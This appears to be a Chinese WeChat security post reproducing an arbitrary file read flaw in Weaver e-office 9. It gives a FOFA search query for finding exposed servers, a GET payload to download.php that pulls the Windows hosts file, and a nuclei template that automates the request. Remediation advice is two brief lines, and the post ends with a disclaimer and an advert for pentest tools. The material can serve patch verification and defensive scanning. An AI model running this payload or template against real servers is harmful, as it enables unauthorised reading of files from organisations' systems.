0x01 应用介绍
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案
0x02 影响版本及语法特征
泛微e-offcie9
fofa:app=”泛微-EOffice” && body=”您的浏览器处于弹出窗口阻止模式!建议您关闭”
0x03 漏洞复现
payload:/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\
直接使用get请求拼接该payload即可下载目标主机hosts文件
下载完成后打开文件查看
下载服务器文件复现成功
nuclei
id: fanwei-E-Office-file-read
info:
name: fanwei-E-Office-file-read
author: fanwei-E-Office-file-read
severity: critical
tags: fanwei
http:
- raw:
- |
GET /general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "127.0.0.1"
- type: status
status:
- 200
修复建议
使用最新版本的应用
限制漏洞路径的访问
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
免费领取安全学习资料包!(私聊进群一起学习,共同进步)
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线